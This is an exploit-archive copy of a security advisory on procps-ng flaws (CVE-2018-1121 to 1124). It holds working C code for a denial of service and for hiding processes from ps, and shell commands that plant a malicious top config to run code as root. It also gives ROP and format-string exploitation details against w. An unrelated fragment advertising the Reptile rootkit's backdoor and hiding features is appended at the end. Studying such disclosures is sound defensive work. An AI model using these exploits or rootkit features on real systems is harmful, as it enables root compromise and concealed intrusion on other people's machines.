        exit(EXIT_FAILURE); \
    } while (0)
    #define PAGESZ ((size_t)4096)
    main(const int argc, const char * const argv[])
        if (argc <= 0) die();
        const char * const arg_start = argv[0];
        const char * const last_arg = argv[argc-1];
        const char * const arg_end = last_arg + strlen(last_arg) + 1;
        if (arg_end <= arg_start) die();
        const size_t len = arg_end - arg_start;
        if (len < 2 * PAGESZ) die();
        char * const addr = (char *)(((size_t)arg_start + PAGESZ-1) & ~(PAGESZ-1));
        if (addr < arg_start) die();
        if (addr + PAGESZ > arg_end) die();
        const int fd = open("/tmp/fuse/hello", O_RDONLY);
        if (fd <= -1) die();
        if (mmap(addr, PAGESZ, PROT_READ, MAP_PRIVATE | MAP_FIXED, fd, 0) != addr) die();
        if (close(fd)) die();
        for (; {
    $ gcc -Wall fuse-backed-cmdline.c -o fuse-backed-cmdline
    $ ./fuse-backed-cmdline `perl -e 'print "A" x 8192'`
    Then, if root executes ps (for example):
    # time ps ax
    real    1m0.021s
    user    0m0.003s
    sys     0m0.017s
    2. Unprivileged process hiding (CVE-2018-1121)
    Several procps-ng utilities (pgrep, pidof, pkill, ps, w) read the
    /proc/PID/cmdline of every process running on the system; hence, an
    unprivileged attacker can hide a process (albeit noisily) by exploiting
    a denial of service in procps-ng (for example, the FUSE-backed denial of
    service, or one of the integer overflows in file2strvec()).
    Alternatively, we devised a stealthier method for hiding a process:
    1/ fork() our process until it occupies the last PID
    (/proc/sys/kernel/pid_max - 1) or one of the last PIDs;
    2/ monitor (with inotify) the /proc directory and the /proc/PID/stat
    file of one of the very first PIDs, for IN_OPEN events (opendir() and
    3/ when these events occur (when a procps-ng utility starts scanning
    /proc for /proc/PID entries), fork() our process until its PID wraps
    around and occupies one of the very first PIDs;
    4/ monitor (with inotify) the /proc directory for an IN_CLOSE_NOWRITE
    event (closedir());
    5/ when this event occurs (when the procps-ng utility stops scanning
    /proc), go back to 1/.
    This simple method works, because the kernel's proc_pid_readdir()
    function returns the /proc/PID entries in ascending numerical order.
    Moreover, this race condition can be made deterministic by using a
    FUSE-backed /proc/PID/cmdline as a synchronization tool.
    $ cat > unprivileged-process-hiding.c << "EOF"
    #include <errno.h>
    #include <limits.h>
    #include <signal.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/inotify.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <sys/wait.h>
    #include <unistd.h>
    #define die() do { \
        fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
        exit(EXIT_FAILURE); \
    } while (0)
        for (; {
            char lost[64];
            const pid_t hi = getpid();
            pid_t lo = fork();
            if (lo <= -1) die();
            if (!lo) { /* child */
                lo = getpid();
                if (lo < hi) exit(EXIT_SUCCESS); /* parent continues */
                for (; {
                    if (kill(hi, 0) != -1) continue;
                    if (errno != ESRCH) die();
            /* parent */
            if (lo > hi) exit(EXIT_FAILURE); /* child continues */
            int status = 0;
            if (waitpid(lo, &status, 0) != lo) die();
            if (!WIFEXITED(status)) die();
            if (WEXITSTATUS(status) != EXIT_SUCCESS) die();
            printf("%d -> %d -> ", hi, lo);
            for (; {
                struct stat st;
                if (--lo <= 0) die();
                snprintf(lost, sizeof(lost), "/proc/%d/stat", lo);
                if (stat(lost, &st) == 0) break;
            printf("%d\n", lo);
            const int pofd = inotify_init();
            if (pofd <= -1) die();
            if (inotify_add_watch(pofd, "/proc", IN_OPEN) <= -1) die();
            const int lofd = inotify_init();
            if (lofd <= -1) die();
            if (inotify_add_watch(lofd, lost, IN_OPEN) <= -1) die();
            const int pcfd = inotify_init();
            if (pcfd <= -1) die();
            if (inotify_add_watch(pcfd, "/proc", IN_CLOSE_NOWRITE) <= -1) die();
            char buf[sizeof(struct inotify_event) + NAME_MAX + 1];
            const struct inotify_event * const evp = (void *)buf;
            for (; {
                if (read(pofd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();
                if (evp->mask & IN_ISDIR) break;
            if (read(lofd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();
            for (; {
                const pid_t hi = getpid();
                pid_t lo = fork();
                if (lo <= -1) die();
                if (lo) exit(EXIT_SUCCESS); /* parent */
                /* child */
                lo = getpid();
                if (lo < hi) {
                    printf("%d -> %d\n", hi, lo);
            for (; {
                if (read(pcfd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();
                if (evp->mask & IN_ISDIR) break;
            if (close(pofd)) die();
            if (close(lofd)) die();
            if (close(pcfd)) die();
    $ gcc -Wall unprivileged-process-hiding.c -o unprivileged-process-hiding
    $ ./unprivileged-process-hiding
    Then, if root executes ps (for example):
    # ps ax | grep '[u]nprivileged-process-hiding' | wc
          0       0       0
    3. Local Privilege Escalation in top (CVE-2018-1122)
    If a/ an administrator executes top in a directory writable by an
    attacker and b/ the HOME environment variable is unset or empty, then
    top reads its configuration file from the current working directory,
    without any security check:
    3829 static void configs_read (void) {
    3847    p_home = getenv("HOME");
    3848    if (!p_home || p_home[0] == '\0')
    3849       p_home = ".";
    3850    snprintf(Rc_name, sizeof(Rc_name), "%s/.%src", p_home, Myname);
    3852    if (!(fp = fopen(Rc_name, "r"))) {
    3865    if (fp) {
    3866       p = config_file(fp, Rc_name, &tmp_delay);
    Although b/ is very unlikely, we developed a simple command-line method
    for exploiting one of the vulnerabilities in config_file(), when top is
    not a PIE (Position-Independent Executable). For example, on Ubuntu
    $ file /usr/bin/top
    /usr/bin/top: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e64fe2c89ff07ca4ce5d169078586d2854628a29, stripped
    First, we dump a clean configuration file to /tmp/.toprc, by running top
    and pressing the 'W' key:
    $ cd /tmp
    $ env -u HOME top
    Second, we add an arbitrary "inspect" command to this configuration file
    (inspect commands are normally executed when the user presses the 'Y'
    $ echo -e 'pipe\tname\tid>>/tmp/top.%d.%lx' >> .toprc
    To execute our inspect command without user interaction, we will emulate
    the 'Y' key by jumping directly into inspection_utility(), at 0x40a989
    (the fflush(stdout) is INSP_BUSY's last instruction):
    3442 static void inspection_utility (int pid) {
    3496          case kbd_ENTER:
    3497             INSP_BUSY;
    3498             Insp_sel = &Inspect.tab[sel];
    3499             Inspect.tab[sel].func(Inspect.tab[sel].fmts, pid);
      40a97d:       48 8b 3d 1c f8 20 00    mov    0x20f81c(%rip),%rdi        # 61a1a0 <stdout>
      40a984:       e8 67 7f ff ff          callq  4028f0 <fflush@plt>
      40a989:       48 63 05 2c f9 20 00    movslq 0x20f92c(%rip),%rax        # 61a2bc
      40a990:       8b 74 24 74             mov    0x74(%rsp),%esi
      40a994:       48 c1 e0 06             shl    $0x6,%rax
      40a998:       48 03 05 61 11 23 00    add    0x231161(%rip),%rax        # 63bb00
      40a99f:       48 89 05 12 11 23 00    mov    %rax,0x231112(%rip)        # 63bab8
      40a9a6:       48 8b 78 18             mov    0x18(%rax),%rdi
      40a9aa:       ff 10                   callq  *(%rax)
      40a9ac:       5b                      pop    %rbx
    To jump directly into inspection_utility(), we will take control of
    top's execution flow, by exploiting a vulnerability in config_file().
    "sortindx" is read from the configuration file without any sanity check,
    and is later used by window_show() to access a struct FLD_t which
    contains a function pointer "sort":
    5876 static int window_show (WIN_t *q, int wmax) {
    5894       qsort(q->ppt, Frame_maxtask, sizeof(proc_t*), Fieldstab[q->rc.sortindx].sort);
      40de01:       ba 08 00 00 00          mov    $0x8,%edx
      40de06:       48 c1 e0 05             shl    $0x5,%rax
      40de0a:       48 8b 88 30 99 61 00    mov    0x619930(%rax),%rcx
      40de11:       e8 7a 47 ff ff          callq  402590 <qsort@plt>
    To take control of this function pointer, we will write 0x40a989's LSW
    (Least Significant Word, 32 bits) into "graph_mems" and 0x40a989's MSW
    (Most Significant Word, 32 bits) into "summclr", which are read from the
    configuration file and written to 0x63ed30 (and 0x63ed34), a memory
    location accessible by 0x619930+(sortindx<<0x5):
    3676 static const char *config_file (FILE *fp, const char *name, float *delay) {
    3710       if (3 > fscanf(fp, "\twinflags=%d, sortindx=%d, maxtasks=%d, graph_cpus=%d, graph_mems=%d\n"
    3711          , &w->rc.winflags, &w->rc.sortindx, &w->rc.maxtasks, &w->rc.graph_cpus, &w->rc.graph_mems))
    3712             return p;
    3713       if (4 != fscanf(fp, "\tsummclr=%d, msgsclr=%d, headclr=%d, taskclr=%d\n"
    3714          , &w->rc.summclr, &w->rc.msgsclr
    3715          , &w->rc.headclr, &w->rc.taskclr))
    3716             return p;
      406f90:       4d 8d b5 30 ed 63 00    lea    0x63ed30(%r13),%r14
      406fa9:       41 56                   push   %r14
      406fb3:       e8 d8 b7 ff ff          callq  402790 <fscanf@plt>
      406fca:       49 8d 95 34 ed 63 00    lea    0x63ed34(%r13),%rdx
      406fe5:       e8 a6 b7 ff ff          callq  402790 <fscanf@plt>
    Next, we modify the configuration file's "graph_mems", "summclr", and
    "sortindx" accordingly:
    $ sed -i s/'graph_mems=[0-9]*'/graph_mems=$((0x40a989))/ .toprc
    $ sed -i s/'summclr=[0-9]*'/summclr=0/ .toprc
    $ sed -i s/'sortindx=[0-9]*'/sortindx=$(((0x63ed30-0x619930)>>0x5))/ .toprc
    Last, we turn off the View_MEMORY bit in the configuration file's
    "winflags", to prevent summary_show() from crashing because of our
    out-of-bounds "graph_mems":
    314 #define View_MEMORY  0x001000     // 'm' - display memory summary
    5418 static void summary_show (void) {
    5499    if (isROOM(View_MEMORY, 2)) {
    5540       if (w->rc.graph_mems) {
    5559          ix = w->rc.graph_mems - 1;
    5572          snprintf(util, sizeof(util), gtab[ix].swap, (int)((pct_swap * Graph_adj) + .5), gtab[ix].type);
    $ winflags=`grep -m 1 winflags= .toprc | sed s/'.*winflags=\([0-9]*\).*'/'\1'/`
    $ sed -i s/'winflags=[0-9]*'/winflags=$((winflags&~0x001000))/ .toprc
    Then, if an administrator executes top in /tmp, without a HOME
    environment variable (or with an empty HOME environment variable):
    # cat /tmp/top.*
    cat: '/tmp/top.*': No such file or directory
    # cd /tmp
    # env -u HOME top
            signal 11 (SEGV) was caught by top, please
            see http://www.debian.org/Bugs/Reporting
    Segmentation fault (core dumped)
    # cat /tmp/top.*
    uid=0(root) gid=0(root) groups=0(root)
    4. Denial of Service in ps (CVE-2018-1123)
    ps's functions pr_args(), pr_comm(), and pr_fname() are vulnerable to an
    mmap-based buffer overflow of outbuf (ps's output buffer):
     401 static int pr_args(char *restrict const outbuf, const proc_t *restrict const pp){
     402   char *endp = outbuf;
     403   int rightward = max_rightward;
     404   int fh = forest_helper(outbuf);
     406   endp += fh;
     407   rightward -= fh;
     409   if(pp->cmdline && !bsd_c_option)
     410     endp += escaped_copy(endp, *pp->cmdline, OUTBUF_SIZE, &rightward);
     411   else
     412     endp += escape_command(endp, pp, OUTBUF_SIZE, &rightward, ESC_DEFUNCT);
     414   if(bsd_e_option && rightward>1) {
     415     if(pp->environ && *pp->environ) {
     416       *endp++ = ' ';
     417       rightward--;
     418       endp += escape_strlist(endp, pp->environ, OUTBUF_SIZE, &rightward);
     419     }
     420   }
     421   return max_rightward-rightward;
     422 }
    The number of bytes written to endp by the escape*() functions is added
    to endp (a pointer into outbuf), but never subtracted from OUTBUF_SIZE.
    Normally "rightward" prevents this buffer overflow, because the maximum
    number of "cells" written to outbuf is OUTBUF_SIZE, and is equal to the
    number of "bytes" written to outbuf; but not in escape_str_utf8():
     36 static int escape_str_utf8(char *restrict dst, const char *restrict src, int bufsize, int *maxcells){
     50     if (!(len = mbrtowc (&wc, src, MB_CUR_MAX, &s)))
     78       int wlen = wcwidth(wc);
    100           memcpy(dst, src, len);
    101           my_cells += wlen;
    102           dst += len;
    103           my_bytes += len;
    104           src += len;
    For example, in the "en_US.UTF-8" locale, the multibyte sequence
    "\xf4\x81\x8e\xb6" consumes 4 bytes, but only 1 cell, and an easy
    trigger for one of the outbuf overflows is:
    $ (A=`python -c 'print "\xf4\x81\x8e\xb6" * 32767'` exec -a `python -c 'print "A" * 65535'` sleep 60) &
    [1] 2670
    # env LANG=en_US.UTF-8 ps awwe
    Signal 11 (SEGV) caught by ps (procps-ng version 3.3.10).
     2670 pts/0    S      0:00ps:display.c:66: please report this bug
    Segmentation fault
    This buffer overflow is a denial of service only (not an LPE), because
    ps mmap()s outbuf and mprotect()s its last page with PROT_NONE (an
    effective guard page):
    2147 void init_output(void){
    2164   outbuf = mmap(
    2165     0,
    2166     page_size * (outbuf_pages+1), // 1 more, for guard page at high addresses
    2167     PROT_READ | PROT_WRITE,
    2169     -1,
    2170     0
    2171   );
    2174   mprotect(outbuf + page_size*outbuf_pages, page_size, PROT_NONE); // guard page
    5. Local Privilege Escalation in libprocps (CVE-2018-1124)
    5.1. Vulnerability
    libprocps's file2strvec() function parses a process's /proc/PID/cmdline
    (or /proc/PID/environ), and creates an in-memory copy of this process's
    argv[] (command-line argument strings, and pointers to these strings).
    file2strvec() is called when either PROC_FILLCOM or PROC_FILLARG, but
    not PROC_EDITCMDLCVT, is passed to openproc() or readproctab() (or
    file2strvec() is vulnerable to three integer overflows (of "tot", "c",
    and "tot + c + align"):
     660 static char** file2strvec(const char* directory, const char* what) {
     661     char buf[2048];     /* read buf bytes at a time */
     662     char *p, *rbuf = 0, *endbuf, **q, **ret;
     663     int fd, tot = 0, n, c, end_of_file = 0;
     664     int align;
     670     /* read whole file into a memory buffer, allocating as we go */
     671     while ((n = read(fd, buf, sizeof buf - 1)) >= 0) {
     686         rbuf = xrealloc(rbuf, tot + n);         /* allocate more memory */
     687         memcpy(rbuf + tot, buf, n);             /* copy buffer into it */
     688         tot += n;                               /* increment total byte ctr */
     697     endbuf = rbuf + tot;                        /* count space for pointers */
     698     align = (sizeof(char*)-1) - ((tot + sizeof(char*)-1) & (sizeof(char*)-1));
     699     for (c = 0, p = rbuf; p < endbuf; p++) {
     700         if (!*p || *p == '\n')
     701             c += sizeof(char*);
     705     c += sizeof(char*);                         /* one extra for NULL term */
     707     rbuf = xrealloc(rbuf, tot + c + align);     /* make room for ptrs AT END */
    To the best of our knowledge, the integer overflows of "c" and "tot + c
    + align" are not exploitable beyond a denial of service: they result in
    an mmap-based buffer overflow of rbuf, but with pointers only (pointers
    to our command-line argument strings, and a NULL terminator). Similarly,
    we were unable to exploit the integer overflow of "tot" on 32-bit.
    On 64-bit, however, the integer overflow of "tot" results in a memcpy()
    of arbitrary bytes (our command-line arguments) to an offset of roughly
    -2GB below rbuf. Surprisingly, the "xrealloc(rbuf, tot + n)" before the
    memcpy() does not exit() when "tot" becomes negative, because xrealloc()
    incorrectly uses an "unsigned int size" argument instead of a size_t
     66 void *xrealloc(void *oldp, unsigned int size) {
    5.2. Exploitation
    To exploit the integer overflow of "tot" on 64-bit, we are faced with
    several difficulties:
    - We must defeat NX, ASLR, PIE, full RELRO, SSP (Stack-Smashing
      Protector), and FORTIFY.
    - Our exploit must be one-shot, or as close to one-shot as possible: we
      may use brute-force if the target procps-ng utility is executed by a
      script, but we have only one chance to exploit this vulnerability if
      the target utility is executed manually by an administrator.
    - We have no control over the target utility's command-line arguments,
      environment variables, or resource limits (it is executed by another
      user, administrator, or script), and we have no direct channel for an
      information leak (we have no access to the target utility's output,
      for example).
    - We were unable to exploit the integer overflow of "tot" when rbuf is
      mmap()ed (but we were also unable to prove that it is unexploitable);
      when the integer "tot" overflows, rbuf is an mmap()ed chunk (its size
      is roughly 2GB), and because Linux's mmap() is a top-down allocator,
      we believe that:
      . rbuf must be allocated in a hole of the mmap-space (to survive the
        memcpy() at a negative offset below rbuf);
      . it is impossible to make such a large hole (in procps-ng, calls to
        the malloc functions are extremely rare).
    Despite these difficulties, we developed proof-of-concept exploits
    against the procps-ng utility "w" on Ubuntu 16.04 (a one-shot exploit
    against a partial RELRO, non-PIE w), Debian 9 and Fedora 27 (a nearly
    one-shot exploit against a full RELRO, PIE w): if we first force "w" to
    malloc()ate n_mmaps_max = 64K mmap()ed chunks (whose size is larger than
    mmap_threshold = 128KB), then malloc() will not call mmap() anymore, but
    will call brk() instead, even for chunks larger than mmap_threshold. The
    2GB rbuf (after the integer overflow of tot) will therefore be allocated
    on the heap by brk(), and because brk() is a bottom-up allocator, we can
    easily arrange for the memcpy() at rbuf - 2GB to overwrite the beginning
    of the heap:
    - if w is not a PIE, we overwrite libprocps's internal PROCTAB structure
      and its function pointers;
    - if w is a PIE, we overwrite the glibc's internal *gettext() structures
      and transform this memory corruption into a format-string exploit.
    To force 64K allocations of 128KB (8GB) in w, we need 64K distinct PIDs
    (each /proc/PID/cmdline allocates 128KB in file2strvec()): consequently,
    /proc/sys/kernel/pid_max must be greater than 64K (it is 32K by default,
    even on 64-bit). This is not an unusual setting: large servers (database
    servers, container and storage platforms) commonly increase the value of
    pid_max (up to 4M on 64-bit). Besides pid_max, other settings may limit
    our ability to spawn 64K processes: /proc/sys/kernel/threads-max,
    RLIMIT_NPROC, and systemd-logind's UserTasksMax. Unlike pid_max,
    however, these limits are not insuperable obstacles:
    - they may be naturally greater than 64K, depending on the total number
      of RAM pages (for /proc/sys/kernel/threads-max and RLIMIT_NPROC) or
      the value of pid_max (for UserTasksMax);
    - they may not apply to the attacker's user account (for example,
      systemd-logind may not at all manage this specific user account);
    - in any case, we do not need to spawn 64K concurrent processes: if we
      use /proc/PID/cmdline as a FUSE-backed synchronization tool, we need
      only a few concurrent processes.
    5.3. Exploitation details
    Our proof-of-concept exploit spawns five different types of processes
    ("main", "mmap", "dist", "wrap", and "srpt"):
    - a long-lived "main" process, which spawns and coordinates the other
    - 64K long-lived "mmap" processes, which guarantee that the ~2GB rbufs
      of our "dist" and "wrap" processes are allocated by brk() in the heap
      of our future "w" target; the "mmap" processes occupy the lowest PIDs
      available, to avoid interference from other processes with the heap
      layout of w;
    - a long-lived "dist" ("distance") process, whose /proc/PID/cmdline is
      carefully constructed to cover the exact distance between our target
      structure (at the beginning of w's heap) and the rbuf of our "wrap"
      process (at the end of w's heap);
    - a long-lived "wrap" ("integer wrap") process, which overflows the
      integer "tot" and overwrites our target structure at the beginning of
      w's heap (with the memcpy() at rbuf - 2GB);
    - short-lived "srpt" ("simulate readproctab") processes, which measure
      the exact distance between our target structure (at the beginning of
      w's heap) and the rbuf of our "wrap" process (at the end of w's heap);
      because this distance depends on an accurate list of processes running
      on the system, our exploit regularly spawns "srpt" processes until the
      distance stabilizes (it is particularly unstable after a reboot).
    We use a few noteworthy tricks in this exploit:
    - we do not fork() but clone() the "mmap" processes (we use the flags
      not CLONE_THREAD, because each process must have its own /proc/PID
      entry): this is much faster, and significantly reduces the memory
      consumption of our exploit (the target "w" process itself already
      consumes over 12GB = 64K*128KB + 2GB + 2GB -- the rbufs for the
      "mmap", "dist", and "wrap" processes);
    - we analyze the ~2GB command-line argument strings of our "dist" and
      "wrap" processes, to detect repeated patterns and replace them with
      our equivalent file-backed mmap()s (this further reduces the memory
      consumption of the exploit); moreover, we replace the argv[] pointers
      of these processes with PROT_NONE mmap()s (hundreds of megabytes that
      are never accessed);
    - we initially simulated readproctab() with our own exploit code, but
      eventually switched to a small LD_PRELOAD library that instruments the
      real "w" utility and provides more accurate measurements.
    There is much room for improvement in this proof-of-concept exploit: for
    example, it depends on the exact distance between our target structure
    (at the beginning of w's heap) and the rbuf of our "wrap" process (at
    the end of w's heap), but this distance is hard to measure inside a
    container, because processes running outside the container are not
    visible inside the container (brute-force may be a solution if the
    target utility is executed by a script, but not if it is executed
    manually by an administrator; better solutions may exist).
    5.4. Non-PIE exploitation
    In this section, we describe our simplest proof-of-concept exploit,
    against the non-PIE "w" on Ubuntu 16.04: we overflow the integer "tot"
    in file2strvec(), we overwrite the PROCTAB structure and its function
    pointers, and we jump into the executable segment of w. However, w is
    very small and contains no useful gadgets, syscall instructions, or
    library calls. Instead, we use a technique pioneered by Nergal in
    http://phrack.org/issues/58/4.html ("5 - The dynamic linker's
    dl-resolve() function"):
    We jump to the very beginning of w's PLT (Procedure Linkage Table),
    which calls _dl_runtime_resolve() and _dl_fixup() with a "reloc_arg"
    that we control (it is read from the stack) and that indexes our own
    fake Elf64_Rela structure (in w's heap), which in turn indexes a fake
    Elf64_Sym structure, which in turn indexes a string that we control and
    that allows us to call any library function, by name (even if it does
    not appear in w's PLT). The obvious choice here is the "system"
    - the RDI register (the first argument of the function pointer that we
      overwrote, and hence the command argument of system()) points to the
      PROCTAB structure, whose contents we control;
    - we do not need to worry about the privilege dropping of /bin/sh,
      because w is not a set-user-ID executable.
    Finally, we must solve two practical problems to use this dynamic-linker
    technique against w:
    - our fake ELF structures are located in the heap, but indexed from the
      executable, and a random gap separates the heap from the executable:
      we therefore allocate four large areas in the heap (large enough to
      defeat the randomization of the heap), one for each of our fake
      structures (Elf64_Rela, Elf64_Sym, "system", and ndx for symbol
    - malloc guarantees a 16-byte alignment, but Elf64_Rela and Elf64_Sym
      are 24-byte structures: luckily, the last 8 bytes of these structures
      are unused, and we therefore truncate our fake structures to 16 bytes.
    For example, on Ubuntu 16.04.4, we overwrite the PROCTAB structure with
    the following ROP chain:
      procfs  taskdir  tdu  df   finder   reader  tfinder
    | id>>/tmp/w.$$        |000|0x4020bb|0x4029db|0x401100| .... |relocarg|0x402a50|
                                                        0xffb8 bytes
    - the first gadget that we execute, 0x4020bb, pivots the stack pointer
      to RDI (which points to the very beginning of the PROCTAB structure):
      "push rdi; ...; pop rsp; pop r13; pop r14; pop r15; pop rbp; ret;"
    - the second gadget that we execute, 0x4029db, increases the stack
      pointer by 0xffb8 bytes (it would otherwise crash into the beginning
      of the heap, because the stack grows down): "ret 0xffb8;"
    - the third gadget that we execute, 0x401100, calls
      _dl_runtime_resolve() and _dl_fixup() with our own "relocarg" (this
      effectively calls system() with the command located at RDI,
      401100:       ff 35 02 2f 20 00       pushq  0x202f02(%rip)
      401106:       ff 25 04 2f 20 00       jmpq   *0x202f04(%rip)
    - the fourth gadget that we execute, 0x402a50, makes a clean exit:
      402a50:       bf 01 00 00 00          mov    $0x1,%edi
      402a55:       e8 36 e7 ff ff          callq  401190 <_exit@plt>
    $ ./w-exploit-Non-PIE
    positive_tot 2147482113
    distance_tot 2147482112
    distance 12024752
    distance 12024752
    off 279917264
    ver_beg  2e26ce0 ver_end  5426ce0
    rel_beg 15f19fb0 rel_end 18519fb0
    str_beg 2900d280 str_end 2b60d280
    sym_beg 3c100570 sym_end 3e700570
    reloc_arg 16957128
    nentries 5
    POSITIVE_TOT 2147482113
    negwrite_off 2147485183
    nentries 1
    Then, if an administrator executes w:
    # cat /tmp/w.*
    cat: '/tmp/w.*': No such file or directory
    # w
    # cat /tmp/w.*
    uid=0(root) gid=0(root) groups=0(root)
    5.5. PIE exploitation
    In this section, we describe our proof-of-concept exploit against the
    PIE "w" on Debian 9 and Fedora 27. The first technique that we tried, a
    partial overwrite of a function pointer in the PROCTAB structure, does
    not work:
    - we are limited to a 2-byte overwrite, or else we lose the "one-shot"
      quality of our exploit (we must brute-force the random bits that we
    - the original function pointer refers to a piece of code in libprocps
      that offers a very limited choice of gadgets;
    - file2strvec() ends our command-line argument strings (which overwrite
      the function pointer) with a null byte, and further reduces the number
      of available gadgets.
    Our second, working technique is derived from halfdog's fascinating
    https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/ and
    transforms libprocps's integer overflow and memory corruption into a
    format-string exploit:
    - we overwrite the dirname pointer to "/usr/share/locale" (a member of
      the struct binding malloc()ated at the very beginning of w's heap by
      bindtextdomain()) with a pointer to "/tmp" -- we do not need to worry
      about ASLR, because we arrange for file2strvec() to overwrite dirname
      with a pointer to our command-line argument strings; alternatively, we
      could overwrite the "procps-ng" string (malloc()ated at the beginning
      of w's heap by textdomain()), but this would also overwrite the chunk
      header of the struct PROCTAB, and would cause a crash in closeproc();
    - we thereby control the translation strings returned by the *gettext()
      functions and the _() macro (the overwritten dirname pointer is used
      to construct the names of the translation files ".mo") and therefore
      control two format-strings in w's main():
    591                 printf(_("%-*s TTY      "), userlen, _("USER"));
    595                         printf(_("  LOGIN@   IDLE   JCPU   PCPU WHAT\n"));
    - we exploit the first format-string to create a pointer to a saved RIP
      on the stack, and we write this pointer to the stack itself;
    - we use this pointer, and the second format-string, to overwrite the
      saved RIP with the address of a useful libc gadget (we return into
      popen() on Debian 9, and wordexp() on Fedora 27).
    However, unlike halfdog, we cannot defeat ASLR by simply dumping the
    contents of the stack with a format-string, because we have not access
    to the output of "w" (it is executed by another user, administrator, or
    script). Instead, we implement Chris Evans's "read-add-write" primitive
    ("Trick #6: co-opting an addition primitive") with format-strings only.
    With the first format-string:
    - we "read" the LSW (Least Significant Word, 32 bits) of a stack pointer
      that is located on the stack itself and hence accessible through the
      format-string arguments -- for example, the argv pointer;
    - we "add" a distribution-specific constant to this LSW, to make it
      point to a saved RIP on the stack -- for example, the saved RIP pushed
      onto the stack by the call to printf_positional() in vfprintf();
    - we "write" this modified LSW to the LSW of another stack pointer that
      is also located on the stack itself and hence accessible through the
      format-string arguments -- for example, the argv[0] pointer.
    With the second format-string:
    - we "read" the LSW of a libc pointer that is located on the stack and
      hence accessible through the format-string arguments -- for example,
      the pointer to __libc_start_main();
    - we "add" a distribution-specific constant to this LSW, to make it
      point to a useful libc gadget -- for example, popen() or wordexp();
    - we "write" this modified LSW to the LSW of a saved RIP on the stack:
      we use the pointer (to the saved RIP) created on the stack by the
      first format-string.
    To implement the "read-add-write" primitive:
    - we "read" the LSW of a pointer (we load it into vfprintf's internal
      character counter) through a variable-width specifier such as "%*R$x",
      where R is the position (among the format-string arguments on the
      stack) of the to-be-read pointer;
    - we "add" a constant A to this LSW through a constant-width specifier
      such as "%Ax";
    - we "write" this modified LSW to the LSW of another pointer through a
      specifier such as "%W$n", where W is the position (among the format-
      string arguments on the stack) of a pointer to the to-be-overwritten
      pointer (for example, in our first format-string we overwrite the LSW
      of the argv[0] pointer through the argv pointer, and in our second
      format-string we overwrite the LSW of a saved RIP through the
      overwritten argv[0] pointer); in summary:
      . if we want to "add" a constant to the LSW that we "read", we use a
        simple format-string such as "%*R$x%Ax%W$n", where A is equal to the
        constant that we want to add;
      . if we want to "subtract" a constant from the LSW that we "read", we
        use a format-string such as "%*R$x%W$n%Ax%W$hn", where A is equal to
        65536 minus the constant that we want to subtract (the smaller the
        constant, the higher the probability of success).
    This generic technique defeats NX, ASLR, PIE, SSP, and FORTIFY, but it
    suffers from three major drawbacks:
    - it requires two different format-strings, because it must reset
      vfprintf's internal character counter between the two "read-add-write"
    - its probability of success is 1/4 (not a one-shot, but not a
      brute-force either), because the probability of success of each
      "read-add-write" primitive is 1/2 (the randomized LSW that is "read"
      as an "int width" must be positive), and the stack is randomized
      independently of the libc;
    - it outputs 2*1GB on average (2*2GB at most): this may be acceptable if
      the target utility is executed by a script or daemon, but not if it is
      executed manually by an administrator (terminal escape sequences may
      be used to overcome this drawback, but we did not explore this
      possibility yet).
    It is also possible to implement distribution-specific variants of this
    generic technique: for example, we developed a Debian-specific version
    of our "w" exploit that requires only one format-string, has an 11/12
    probability of success (nearly one-shot), and outputs only a few
    kilobytes. This is left as an exercise for the interested reader.
    #  0day.today [2018-05-31]  #

    Source: 0day.today

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    Reptile is a Linux kernel module rootkit that hides files, processes, etc. It implements ICMP/UDP/TCP port-knocking backdoors, supports kernels 2.6.x/3.x/4.x, and more.



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    •  Hide files and directories
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    •  Hide processes
    •  Hide himself
    •  Hidden boot persistence
    •  Strings obfuscation. Method suggested by: [milabs](https://github.com/milabs)
    •  ICMP/UDP/TCP port-knocking backdoor
    •  Full TTY/PTY shell with file transfer
    •  Client to handle Reptile Shell
    •  Shell connect back each X times (not default)




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